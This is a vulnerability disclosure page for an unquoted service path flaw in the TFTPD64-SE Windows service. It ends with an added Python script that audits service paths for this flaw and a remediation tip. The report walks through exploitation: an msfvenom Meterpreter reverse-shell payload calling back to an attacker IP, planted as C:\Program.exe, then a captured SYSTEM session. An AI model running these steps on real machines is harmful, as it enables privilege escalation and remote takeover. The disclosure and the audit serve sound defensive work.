Submit #88694: TFTPD64-SE Privilege Escalation (Unquoted Service Path)

Title: TFTPD64-SE Privilege Escalation (Unquoted Service Path)
Description:

Reporter: Anthony "RedHatAugust" Radzykewycz
Download: https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd64_SE-4.64-setup.exe
Reached out to Developer: https://bitbucket.org/phjounin/tftpd64/issues/31/discovered-vulnerability-in-tftpd64 - no response
Tested on Windows 10 and Windows 11

If Windows is misconfigured to allow a user to create files in the root directory, an executable named "Program.exe" can be placed under that directory and triggered by starting this service.

Discovery:

In a command prompt, enter the following:

    wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Result:

    C:\Users\User>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
    Tftpd32 service edition    Tftpd32_svc    C:\Program Files\Tftpd64_SE\tftpd64_svc.exe    Auto

To Replicate:

Ensure that user has write privileges in root directory

    C:\>icacls C:\
    C:\ NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(M)
        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
        BUILTIN\Administrators:(OI)(CI)(F)
        BUILTIN\Users:(OI)(CI)(RX,W)
        Mandatory Label\High Mandatory Level:(OI)(NP)(IO)(NW)

    Successfully processed 1 files; Failed processing 0 files

Create a reverse shell

    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=6666 -f exe > Program.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 510 bytes
    Final size of exe file: 7168 bytes

Create listener (steps skipped for brevity)

Place Program.exe in C:\

Restart Windows host

SYSTEM Shell

    msf6 exploit(multi/handler) > exploit

    [*] Started reverse TCP handler on 192.168.0.192:6666
    [*] Sending stage (200774 bytes) to 192.168.0.149
    [*] Meterpreter session 2 opened (192.168.0.192:6666 -> 192.168.0.149:49670) at 2023-02-13 11:04:19 -0700

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
User: RedHatAugust (UID 37704)
Submission: 02/13/2023 19:06 (3 years ago)
Moderation: 02/17/2023 09:20 (4 days later)
Status: Accepted
VulDB entry: 221351 [phjounin TFTPD64-SE 4.64 tftpd64_svc.exe unquoted search path]
Points: 17
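
Added example, not part of the original submission or of the TFTPD64 project: a small Python audit that takes service PathName values such as those returned by the wmic query in the description, flags the unquoted ones that contain a space, lists the paths Windows resolves before the real binary, and produces the quoted value to set instead. Only the Tftpd32_svc entry comes from the page; the other two sample services and all function names are constructed for illustration.

```python
import ntpath
import re

# Constructed sample of (Name, PathName) pairs as returned by the wmic query.
# Only the Tftpd32_svc path is taken from the report; the others are made up.
SAMPLE = [
    ("Tftpd32_svc", r"C:\Program Files\Tftpd64_SE\tftpd64_svc.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor App\svc.exe" --run'),
    ("NoSpaceSvc", r"C:\Tools\agent.exe -k netsvcs"),
]

def split_pathname(pathname):
    """Return (executable, arguments, was_quoted) for a service PathName."""
    pathname = pathname.strip()
    m = re.match(r'"([^"]*)"?\s*(.*)$', pathname)
    if m:
        return m.group(1), m.group(2), True
    m = re.match(r"(?i)(.*?\.exe)(?:\s+(.*))?$", pathname)
    if m:
        return m.group(1), m.group(2) or "", False
    return pathname, "", False

def tried_before_real_binary(exe):
    """Paths resolved first for an unquoted command line: one per space."""
    tried = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            # ".exe" is appended when the truncated name has no extension.
            has_ext = bool(ntpath.splitext(ntpath.basename(prefix))[1])
            tried.append(prefix if has_ext else prefix + ".exe")
    return tried

def audit(services):
    findings = []
    for name, pathname in services:
        exe, args, quoted = split_pathname(pathname)
        if quoted or " " not in exe:
            continue  # quoted, or no space to split on: not affected
        findings.append({
            "service": name,
            "tried_first": tried_before_real_binary(exe),
            "fixed_pathname": f'"{exe}"' + (f" {args}" if args else ""),
        })
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The quoted value belongs in the service's ImagePath (for example via sc config with binPath=). Removing write access for non-administrators on C:\ closes the precondition the report depends on.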
